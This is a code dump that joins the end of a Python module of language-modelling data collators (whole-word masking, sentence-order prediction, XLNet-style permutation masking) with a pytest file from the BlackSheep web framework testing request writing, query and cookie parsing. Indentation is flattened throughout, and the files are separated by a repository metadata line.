batch_mask = _tf_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.tf_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
input_ids = [e["input_ids"] for e in examples]
else:
input_ids = examples
examples = [{"input_ids": e} for e in examples]
batch_input = _numpy_collate_batch(input_ids, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
mask_labels = []
for e in examples:
ref_tokens = []
for id in tolist(e["input_ids"]):
token = self.tokenizer._convert_id_to_token(id)
ref_tokens.append(token)
# For Chinese tokens, we need extra inf to mark sub-word, e.g [喜,欢]-> [喜,##欢]
if "chinese_ref" in e:
ref_pos = tolist(e["chinese_ref"])
len_seq = len(e["input_ids"])
for i in range(len_seq):
if i in ref_pos:
ref_tokens[i] = "##" + ref_tokens[i]
mask_labels.append(self._whole_word_mask(ref_tokens))
batch_mask = _numpy_collate_batch(mask_labels, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
inputs, labels = self.numpy_mask_tokens(batch_input, batch_mask)
return {"input_ids": inputs, "labels": labels}
def _whole_word_mask(self, input_tokens: List[str], max_predictions=512):
"""
Get 0/1 labels for masked tokens with whole word mask proxy
"""
if not isinstance(self.tokenizer, (BertTokenizer, BertTokenizerFast)):
warnings.warn(
"DataCollatorForWholeWordMask is only suitable for BertTokenizer-like tokenizers. "
"Please refer to the documentation for more information."
)
cand_indexes = []
for (i, token) in enumerate(input_tokens):
if token == "[CLS]" or token == "[SEP]":
continue
if len(cand_indexes) >= 1 and token.startswith("##"):
cand_indexes[-1].append(i)
else:
cand_indexes.append([i])
random.shuffle(cand_indexes)
num_to_predict = min(max_predictions, max(1, int(round(len(input_tokens) * self.mlm_probability))))
masked_lms = []
covered_indexes = set()
for index_set in cand_indexes:
if len(masked_lms) >= num_to_predict:
break
# If adding a whole-word mask would exceed the maximum number of
# predictions, then just skip this candidate.
if len(masked_lms) + len(index_set) > num_to_predict:
continue
is_any_index_covered = False
for index in index_set:
if index in covered_indexes:
is_any_index_covered = True
break
if is_any_index_covered:
continue
for index in index_set:
covered_indexes.add(index)
masked_lms.append(index)
if len(covered_indexes) != len(masked_lms):
raise ValueError("Length of covered_indexes is not equal to length of masked_lms.")
mask_labels = [1 if i in covered_indexes else 0 for i in range(len(input_tokens))]
return mask_labels
def torch_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set
'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = inputs.clone()
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
probability_matrix = mask_labels
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
probability_matrix.masked_fill_(padding_mask, value=0.0)
masked_indices = probability_matrix.bool()
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def tf_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set
'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref.
"""
import tensorflow as tf
input_shape = tf.shape(inputs)
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = tf.identity(inputs)
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
masked_indices = tf.cast(mask_labels, tf.bool)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels
]
masked_indices = masked_indices & ~tf.cast(special_tokens_mask, dtype=tf.bool)
if self.tokenizer._pad_token is not None:
padding_mask = inputs == self.tokenizer.pad_token_id
masked_indices = masked_indices & ~padding_mask
# Replace unmasked indices with -100 in the labels since we only compute loss on masked tokens
labels = tf.where(masked_indices, inputs, -100)
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = self.tf_bernoulli(input_shape, 0.8) & masked_indices
inputs = tf.where(indices_replaced, self.tokenizer.mask_token_id, inputs)
# 10% of the time, we replace masked input tokens with random word
indices_random = self.tf_bernoulli(input_shape, 0.1) & masked_indices & ~indices_replaced
random_words = tf.random.uniform(input_shape, maxval=len(self.tokenizer), dtype=tf.int64)
inputs = tf.where(indices_random, random_words, inputs)
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
def numpy_mask_tokens(self, inputs: Any, mask_labels: Any) -> Tuple[Any, Any]:
"""
Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set
'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref.
"""
import numpy as np
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = np.copy(inputs)
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
masked_indices = mask_labels.astype(np.bool)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
masked_indices[np.array(special_tokens_mask, dtype=np.bool)] = 0
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices[padding_mask] = 0
labels[~masked_indices] = -100 # We only compute loss on masked tokens
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = np.random.binomial(1, 0.8, size=labels.shape).astype(np.bool) & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
# indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
indices_random = (
np.random.binomial(1, 0.5, size=labels.shape).astype(np.bool) & masked_indices & ~indices_replaced
)
random_words = np.random.randint(low=0, high=len(self.tokenizer), size=labels.shape, dtype=np.int64)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels
@dataclass
class DataCollatorForSOP(DataCollatorForLanguageModeling):
"""
Data collator used for sentence order prediction task.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for both masked language modeling and sentence order prediction
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"DataCollatorForSOP is deprecated and will be removed in a future version, you can now use "
"DataCollatorForLanguageModeling instead.",
FutureWarning,
)
def __call__(self, examples: List[Dict[str, Any]]) -> Dict[str, Any]:
import torch
from torch.nn.utils.rnn import pad_sequence
input_ids = [example["input_ids"] for example in examples]
input_ids = _torch_collate_batch(input_ids, self.tokenizer)
input_ids, labels, attention_mask = self.mask_tokens(input_ids)
token_type_ids = [example["token_type_ids"] for example in examples]
# size of segment_ids varied because randomness, padding zero to the end as the original implementation
token_type_ids = pad_sequence(token_type_ids, batch_first=True, padding_value=self.tokenizer.pad_token_id)
sop_label_list = [example["sentence_order_label"] for example in examples]
sentence_order_label = torch.stack(sop_label_list)
return {
"input_ids": input_ids,
"labels": labels,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"sentence_order_label": sentence_order_label,
}
def mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any]:
"""
Prepare masked tokens inputs/labels/attention_mask for masked language modeling: 80% MASK, 10% random, 10%
original. N-gram not applied yet.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for masked language modeling. Remove the --mlm flag if you want to use this tokenizer."
)
labels = inputs.clone()
# We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)
probability_matrix = torch.full(labels.shape, self.mlm_probability)
special_tokens_mask = [
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()
]
probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
probability_matrix.masked_fill_(padding_mask, value=0.0)
masked_indices = torch.bernoulli(probability_matrix).bool()
# probability be `1` (masked), however in albert model attention mask `0` means masked, revert the value
attention_mask = (~masked_indices).float()
if self.tokenizer._pad_token is not None:
attention_padding_mask = labels.eq(self.tokenizer.pad_token_id)
attention_mask.masked_fill_(attention_padding_mask, value=1.0)
labels[~masked_indices] = -100 # We only compute loss on masked tokens, -100 is default for CE compute
# 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])
indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices
inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)
# 10% of the time, we replace masked input tokens with random word
indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced
random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)
inputs[indices_random] = random_words[indices_random]
# The rest of the time (10% of the time) we keep the masked input tokens unchanged
return inputs, labels, attention_mask
@dataclass
class DataCollatorForPermutationLanguageModeling(DataCollatorMixin):
"""
Data collator used for permutation language modeling.
- collates batches of tensors, honoring their tokenizer's pad_token
- preprocesses batches for permutation language modeling with procedures specific to XLNet
"""
tokenizer: PreTrainedTokenizerBase
plm_probability: float = 1 / 6
max_span_length: int = 5 # maximum length of a span of masked tokens
return_tensors: str = "pt"
def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _torch_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.torch_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def tf_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _tf_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.tf_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def numpy_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
if isinstance(examples[0], Mapping):
examples = [e["input_ids"] for e in examples]
batch = _numpy_collate_batch(examples, self.tokenizer)
inputs, perm_mask, target_mapping, labels = self.numpy_mask_tokens(batch)
return {"input_ids": inputs, "perm_mask": perm_mask, "target_mapping": target_mapping, "labels": labels}
def torch_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
import torch
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if inputs.size(1) % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = inputs.clone()
# Creating the mask and target_mapping tensors
masked_indices = torch.full(labels.shape, 0, dtype=torch.bool)
target_mapping = torch.zeros((labels.size(0), labels.size(1), labels.size(1)), dtype=torch.float32)
for i in range(labels.size(0)):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = labels.size(1)
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = torch.randint(1, self.max_span_length + 1, (1,)).item()
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + torch.randint(context_length - span_length + 1, (1,)).item()
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
# the i-th predict corresponds to the i-th token.
target_mapping[i] = torch.eye(labels.size(1))
special_tokens_mask = torch.tensor(
[self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()],
dtype=torch.bool,
)
masked_indices.masked_fill_(special_tokens_mask, value=0.0)
if self.tokenizer._pad_token is not None:
padding_mask = labels.eq(self.tokenizer.pad_token_id)
masked_indices.masked_fill_(padding_mask, value=0.0)
# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs[masked_indices] = self.tokenizer.mask_token_id
labels[~masked_indices] = -100 # We only compute loss on masked tokens
perm_mask = torch.zeros((labels.size(0), labels.size(1), labels.size(1)), dtype=torch.float32)
for i in range(labels.size(0)):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
perm_index = torch.arange(labels.size(1))
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = perm_index.reshape((-1, labels.size(1) // 2)).transpose(0, 1)
# Permute the two halves such that they do not cross over
perm_index = perm_index[torch.randperm(labels.size(1) // 2)]
# Flatten this out into the desired permuted factorisation order
perm_index = torch.flatten(perm_index.transpose(0, 1))
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index.masked_fill_(~masked_indices[i] & non_func_mask[i], -1)
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask[i] = (
perm_index.reshape((labels.size(1), 1)) <= perm_index.reshape((1, labels.size(1)))
) & masked_indices[i]
return inputs.long(), perm_mask, target_mapping, labels.long()
def tf_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
from random import randint
import numpy as np
import tensorflow as tf
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if tf.shape(inputs)[1] % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = tf.identity(inputs)
# Creating the mask and target_mapping tensors
masked_indices = np.full(labels.shape.as_list(), 0, dtype=np.bool)
labels_shape = tf.shape(labels)
target_mapping = np.zeros((labels_shape[0], labels_shape[1], labels_shape[1]), dtype=np.float32)
for i in range(len(labels)):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = tf.shape(labels)[1]
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = randint(1, self.max_span_length + 1)
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + randint(0, context_length - span_length + 1)
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
# the i-th predict corresponds to the i-th token.
target_mapping[i] = np.eye(labels_shape[1])
masked_indices = tf.cast(tf.convert_to_tensor(masked_indices), dtype=tf.bool)
target_mapping = tf.convert_to_tensor(target_mapping)
special_tokens_mask = tf.convert_to_tensor(
[
self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True)
for val in labels.numpy().tolist()
],
)
special_tokens_mask = tf.cast(special_tokens_mask, dtype=tf.bool)
masked_indices = masked_indices & ~special_tokens_mask
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices = masked_indices & ~padding_mask
# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs = tf.where(masked_indices, self.tokenizer.mask_token_id, inputs)
labels = tf.where(masked_indices, labels, -100) # We only compute loss on masked tokens
perm_mask = []
for i in range(len(labels)):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
# tf.range is the equivalent of torch.arange
perm_index = tf.range(labels_shape[1])
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = tf.transpose(tf.reshape(perm_index, (-1, labels_shape[1] // 2)))
# Permute the two halves such that they do not cross over
perm_index = tf.random.shuffle(perm_index) # Shuffles along the first dimension
# Flatten this out into the desired permuted factorisation order
perm_index = tf.reshape(tf.transpose(perm_index), (-1,))
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index = tf.where(~masked_indices[i] & non_func_mask[i], -1, perm_index)
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask.append(
(tf.reshape(perm_index, (labels_shape[1], 1)) <= tf.reshape(perm_index, (1, labels_shape[1])))
& masked_indices[i]
)
perm_mask = tf.stack(perm_mask, axis=0)
return tf.cast(inputs, tf.int64), tf.cast(perm_mask, tf.float32), target_mapping, tf.cast(labels, tf.int64)
def numpy_mask_tokens(self, inputs: Any) -> Tuple[Any, Any, Any, Any]:
"""
The masked tokens to be predicted for a particular sequence are determined by the following algorithm:
0. Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
1. Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
2. Reserve a context of length `context_length = span_length / plm_probability` to surround span to be
masked
3. Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length -
span_length]` and mask tokens `start_index:start_index + span_length`
4. Set `cur_len = cur_len + context_length`. If `cur_len < max_len` (i.e. there are tokens remaining in the
sequence to be processed), repeat from Step 1.
"""
from random import randint
import numpy as np
if self.tokenizer.mask_token is None:
raise ValueError(
"This tokenizer does not have a mask token which is necessary for permutation language modeling. Please add a mask token if you want to use this tokenizer."
)
if inputs.shape[1] % 2 != 0:
raise ValueError(
"This collator requires that sequence lengths be even to create a leakage-free perm_mask. Please see relevant comments in source code for details."
)
labels = np.copy(inputs)
# Creating the mask and target_mapping tensors
masked_indices = np.full(labels.shape, 0, dtype=np.bool)
target_mapping = np.zeros((labels.shape[0], labels.shape[1], labels.shape[1]), dtype=np.float32)
for i in range(labels.shape[0]):
# Start from the beginning of the sequence by setting `cur_len = 0` (number of tokens processed so far).
cur_len = 0
max_len = labels.shape[1]
while cur_len < max_len:
# Sample a `span_length` from the interval `[1, max_span_length]` (length of span of tokens to be masked)
span_length = randint(1, self.max_span_length + 1)
# Reserve a context of length `context_length = span_length / plm_probability` to surround the span to be masked
context_length = int(span_length / self.plm_probability)
# Sample a starting point `start_index` from the interval `[cur_len, cur_len + context_length - span_length]` and mask tokens `start_index:start_index + span_length`
start_index = cur_len + randint(0, context_length - span_length + 1)
masked_indices[i, start_index : start_index + span_length] = 1
# Set `cur_len = cur_len + context_length`
cur_len += context_length
# Since we're replacing non-masked tokens with -100 in the labels tensor instead of skipping them altogether,
# the i-th predict corresponds to the i-th token.
target_mapping[i] = np.eye(labels.shape[1])
special_tokens_mask = np.array(
[self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()],
dtype=np.bool,
)
masked_indices[special_tokens_mask] = 0
if self.tokenizer._pad_token is not None:
padding_mask = labels == self.tokenizer.pad_token_id
masked_indices[padding_mask] = 0.0
# Mask indicating non-functional tokens, where functional tokens are [SEP], [CLS], padding, etc.
non_func_mask = ~(padding_mask | special_tokens_mask)
inputs[masked_indices] = self.tokenizer.mask_token_id
labels[~masked_indices] = -100 # We only compute loss on masked tokens
perm_mask = np.zeros((labels.shape[0], labels.shape[1], labels.shape[1]), dtype=np.float32)
for i in range(labels.shape[0]):
# Generate permutation indices i.e. sample a random factorisation order for the sequence. This will
# determine which tokens a given token can attend to (encoded in `perm_mask`).
# Note: Length of token sequence being permuted has to be less than or equal to reused sequence length
# (see documentation for `mems`), otherwise information may leak through due to reuse. In this implementation,
# we assume that reused length is half of sequence length and permutation length is equal to reused length.
# This requires that the sequence length be even.
# Create a linear factorisation order
perm_index = np.arange(labels.shape[1])
# Split this into two halves, assuming that half the sequence is reused each time
perm_index = perm_index.reshape((-1, labels.shape[1] // 2)).T
# Permute the two halves such that they do not cross over
np.random.shuffle(perm_index)
# Flatten this out into the desired permuted factorisation order
perm_index = perm_index.T.flatten()
# Set the permutation indices of non-masked (non-functional) tokens to the
# smallest index (-1) so that:
# (1) They can be seen by all other positions
# (2) They cannot see masked positions, so there won't be information leak
perm_index[~masked_indices[i] & non_func_mask[i]] = -1
# The logic for whether the i-th token can attend on the j-th token based on the factorisation order:
# 0 (can attend): If perm_index[i] > perm_index[j] or j is neither masked nor a functional token
# 1 (cannot attend): If perm_index[i] <= perm_index[j] and j is either masked or a functional token
perm_mask[i] = (
perm_index.reshape((labels.shape[1], 1)) <= perm_index.reshape((1, labels.shape[1]))
) & masked_indices[i]
return inputs.astype(np.int64), perm_mask, target_mapping, labels.astype(np.int64)
|
tests/test_requests.py
|
q0w/BlackSheep
| 420 |
69635
|
<filename>tests/test_requests.py<gh_stars>100-1000
import pytest
from blacksheep import Content, Request, scribe
from blacksheep.contents import FormPart, MultiPartFormData
from blacksheep.exceptions import BadRequestFormat
from blacksheep.messages import get_absolute_url_to_path, get_request_absolute_url
from blacksheep.scribe import write_small_request
from blacksheep.server.asgi import (
get_request_url,
get_request_url_from_scope,
incoming_request,
)
from blacksheep.testing.helpers import get_example_scope
from blacksheep.url import URL
def test_request_supports_dynamic_attributes():
request = Request("GET", b"/", None)
foo = object()
assert (
hasattr(request, "foo") is False
), "This test makes sense if such attribute is not defined"
request.foo = foo # type: ignore
assert request.foo is foo # type: ignore
@pytest.mark.asyncio
@pytest.mark.parametrize(
"url,method,headers,content,expected_result",
[
(
b"https://robertoprevato.github.io",
"GET",
[],
None,
b"GET / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
),
(
b"https://robertoprevato.github.io",
"HEAD",
[],
None,
b"HEAD / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
),
(
b"https://robertoprevato.github.io",
"POST",
[],
None,
b"POST / HTTP/1.1\r\nhost: robertoprevato.github.io\r\ncontent-length: 0\r\n\r\n",
),
(
b"https://robertoprevato.github.io/How-I-created-my-own-media-storage-in-Azure/",
"GET",
[],
None,
b"GET /How-I-created-my-own-media-storage-in-Azure/ HTTP/1.1\r\nhost: robertoprevato.github.io"
b"\r\ncontent-length: 0\r\n\r\n",
),
(
b"https://foo.org/a/b/c/?foo=1&ufo=0",
"GET",
[],
None,
b"GET /a/b/c/?foo=1&ufo=0 HTTP/1.1\r\nhost: foo.org\r\ncontent-length: 0\r\n\r\n",
),
],
)
async def test_request_writing(url, method, headers, content, expected_result):
request = Request(method, url, headers).with_content(content)
data = b""
async for chunk in scribe.write_request(request):
data += chunk
assert data == expected_result
@pytest.mark.parametrize(
"url,query,parsed_query",
[
(b"https://foo.org/a/b/c?hello=world", b"hello=world", {"hello": ["world"]}),
(
b"https://foo.org/a/b/c?hello=world&foo=power",
b"hello=world&foo=power",
{"hello": ["world"], "foo": ["power"]},
),
(
b"https://foo.org/a/b/c?hello=world&foo=power&foo=200",
b"hello=world&foo=power&foo=200",
{"hello": ["world"], "foo": ["power", "200"]},
),
],
)
def test_parse_query(url, query, parsed_query):
request = Request("GET", url, None)
assert request.url.value == url
assert request.url.query == query
assert request.query == parsed_query
@pytest.mark.asyncio
async def test_can_read_json_data_even_without_content_type_header():
request = Request("POST", b"/", None)
request.with_content(Content(b"application/json", b'{"hello":"world","foo":false}'))
json = await request.json()
assert json == {"hello": "world", "foo": False}
@pytest.mark.asyncio
async def test_if_read_json_fails_content_type_header_is_checked_json_gives_bad_request_format():
request = Request("POST", b"/", [(b"Content-Type", b"application/json")])
request.with_content(Content(b"application/json", b'{"hello":')) # broken json
with pytest.raises(BadRequestFormat):
await request.json()
@pytest.mark.asyncio
async def test_if_read_json_fails_content_type_header_is_checked_non_json_gives_invalid_operation():
request = Request("POST", b"/", [])
request.with_content(
Content(b"application/json", b'{"hello":')
) # broken json; broken content-type
with pytest.raises(BadRequestFormat):
await request.json()
def test_cookie_parsing():
request = Request(
"POST", b"/", [(b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B;")]
)
assert request.cookies == {
"ai": "something",
"hello": "world",
"foo": "Hello World;",
}
def test_cookie_parsing_multiple_cookie_headers():
request = Request(
"POST",
b"/",
[
(b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B;"),
(b"Cookie", b"jib=jab; ai=else;"),
],
)
assert request.cookies == {
"ai": "else",
"hello": "world",
"foo": "Hello World;",
"jib": "jab",
}
def test_cookie_parsing_duplicated_cookie_header_value():
request = Request(
"POST",
b"/",
[(b"Cookie", b"ai=something; hello=world; foo=Hello%20World%3B; hello=kitty;")],
)
assert request.cookies == {
"ai": "something",
"hello": "kitty",
"foo": "Hello World;",
}
@pytest.mark.parametrize(
"header,expected_result",
[
[(b"Expect", b"100-Continue"), True],
[(b"expect", b"100-continue"), True],
[(b"X-Foo", b"foo"), False],
],
)
def test_request_expect_100_continue(header, expected_result):
request = Request("POST", b"/", [header])
assert expected_result == request.expect_100_continue()
@pytest.mark.parametrize(
"headers,expected_result",
[
[[(b"Content-Type", b"application/json")], True],
[[(b"Content-Type", b"application/problem+json")], True],
[[(b"Content-Type", b"application/json; charset=utf-8")], True],
[[], False],
[[(b"Content-Type", b"application/xml")], False],
],
)
def test_request_declares_json(headers, expected_result):
request = Request("GET", b"/", headers)
assert request.declares_json() is expected_result
def test_small_request_headers_add_through_higher_api():
request = Request("GET", b"https://hello-world", None)
request.headers.add(b"Hello", b"World")
raw_bytes = write_small_request(request)
assert b"Hello: World\r\n" in raw_bytes
def test_small_request_headers_add_through_higher_api_many():
request = Request("GET", b"https://hello-world", None)
request.headers.add_many({b"Hello": b"World", b"X-Foo": b"Foo"})
raw_bytes = write_small_request(request)
assert b"Hello: World\r\n" in raw_bytes
assert b"X-Foo: Foo\r\n" in raw_bytes
def test_small_request_headers_add_through_lower_api():
request = Request("GET", b"https://hello-world", None)
request.add_header(b"Hello", b"World")
raw_bytes = write_small_request(request)
assert b"Hello: World\r\n" in raw_bytes
@pytest.mark.parametrize(
"initial_url,new_url",
[
(b"https://hello-world/", b"https://ciao-mondo/"),
(b"https://hello-world/one/two/three", b"https://hello-world/one/two/three/"),
(b"https://hello-world/one/two/three/", b"https://hello-world/one/two/three"),
],
)
def test_request_can_update_url(initial_url, new_url):
request = Request("GET", initial_url, None)
assert request.url.value == initial_url
